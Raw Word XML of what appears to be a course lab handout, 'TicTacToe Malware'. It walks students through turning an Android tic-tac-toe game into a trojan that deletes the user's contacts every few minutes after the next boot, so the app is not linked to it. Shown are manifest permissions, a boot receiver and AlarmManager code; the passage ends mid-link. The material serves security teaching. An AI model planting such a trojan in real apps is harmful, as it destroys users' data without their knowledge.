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29E7" w:rsidRDefault="00366FD4" w:rsidP="000B19A1">
      <w:pPr>
        <w:pStyle w:val="papertitle"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="009303D9" w:rsidRPr="004729E7" w:rsidSect="00D1238F">
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TicTacToe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009303D9" w:rsidRPr="004729E7" w:rsidRDefault="009303D9" w:rsidP="00DB26FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00475489" w:rsidRPr="004729E7" w:rsidRDefault="00475489" w:rsidP="00DB26FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00475489" w:rsidRPr="004729E7" w:rsidSect="00D1238F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="009303D9" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007F3283">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3283">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="002129BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="002129BE">
        <w:t xml:space="preserve"> malicious</w:t>
      </w:r>
      <w:r w:rsidR="002129BE" w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> tic tac toe game</w:t>
      </w:r>
      <w:r w:rsidR="002129BE">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="002129BE" w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> delete the users contact list </w:t>
      </w:r>
      <w:r w:rsidR="002129BE">
        <w:t>when the user boots up the phone next time</w:t>
      </w:r>
      <w:r w:rsidR="002129BE" w:rsidRPr="002129BE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRPr="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00CC4C74">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="002129BE" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t>he Trojan run</w:t>
      </w:r>
      <w:r>
        <w:t>s as</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> a background service on the phone and periodically delete</w:t>
      </w:r>
      <w:r>
        <w:t>s contact list</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> every few minutes. </w:t>
      </w:r>
      <w:r>
        <w:t>In order to</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> disconnect the link between the app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve">being the source of the Trojan, </w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> only run</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002129BE">
        <w:t xml:space="preserve"> after the next boot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="00222949" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="002129BE" w:rsidP="00222949">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab Activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="002129BE" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Dowload TicTacToe.zip, unzip it in your workspace, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>import it into your Eclipse IDE. This is a simple game, and now you will place some malware in it</w:t>
      </w:r>
      <w:r w:rsidR="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="00D1238F" w:rsidP="00CC4C74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Add two java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>classes to the project StartAttack and RunTrojan.</w:t>
      </w:r>
      <w:r w:rsidR="00CC4C74">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>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CC4C74" w:rsidRPr="00F26D6B" w:rsidTr="000B4BE3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00CC4C74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00294686">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>public class StartAttack extends BroadcastReceiver {</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>…}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CC4C74" w:rsidRPr="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00CC4C74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00294686">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>public class RunTrojan extends BroadcastReceiver{</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>…}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="00CC4C74" w:rsidP="00CC4C74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>For information on BroadcastReceiver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>refer to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRDefault="001D01A7" w:rsidP="00CC4C74">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00CC4C74" w:rsidRPr="008C0429">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://developer.android.com/reference/android/content/BroadcastReceiver.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CC4C74" w:rsidRPr="00D1238F" w:rsidRDefault="00CC4C74" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Add t</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">hese permissions in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AndroidManifest.xml:</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D1238F" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.READ_CONTACTS" /&gt;</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lt;uses-permission android:name="android.permission.WRITE_CONTACTS" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00F26D6B" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">READ/WRITE_CONTACTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing and changing the contact info on the phone; RECEIVE_BOOT_COMPLETED is for when the phone starts up, which is when I wanted the attack to begin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>I also need a BOOT_COMPLETED intent-filter to fire when the device first starts up and have it call the receiver that sets up the attack. I also register another receiver for running the service periodically (so it never quits), and the service for performing the attack.</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D1238F" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;receiver android:name=".StartAttack" &gt;</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lt;intent-filter&gt;</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 xml:space="preserve">              &lt;action android:name="android.intent.action.BOOT_COMPLETED" /&gt;</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 xml:space="preserve">       &lt;/intent-filter&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;/receiver&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00154046" w:rsidRPr="00F26D6B" w:rsidRDefault="00154046" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00154046">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;receiver android:name=".RunTrojan" /receiver&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">In StartAttack.java, which is the class called when the next boot happens so long as the app is installed, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>set up a periodic alarm that activates the RunTrojan class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>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D1238F" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AlarmManager service = (AlarmManager)context.getSystemService(Context.ALARM_SERVICE); Intent i = new Intent(context, RunTrojan.class);  </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PendingIntent pending = PendingIntent.getBroadcast(context, 0, i, PendingIntent.FLAG_CANCEL_CURRENT);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D1238F" w:rsidRPr="00F26D6B" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1238F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>service.setInexactRepeating(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(), TIME, pending);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="00D1238F" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00CC4C74">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">or information on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1238F">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AlarmManager</w:t>
      </w:r>
      <w:r w:rsidR="00CC4C74">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, refer to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1238F" w:rsidRDefault="001D01A7" w:rsidP="00D1238F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00D1238F" w:rsidRPr="004E7614">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:szCs w:val="22"/>
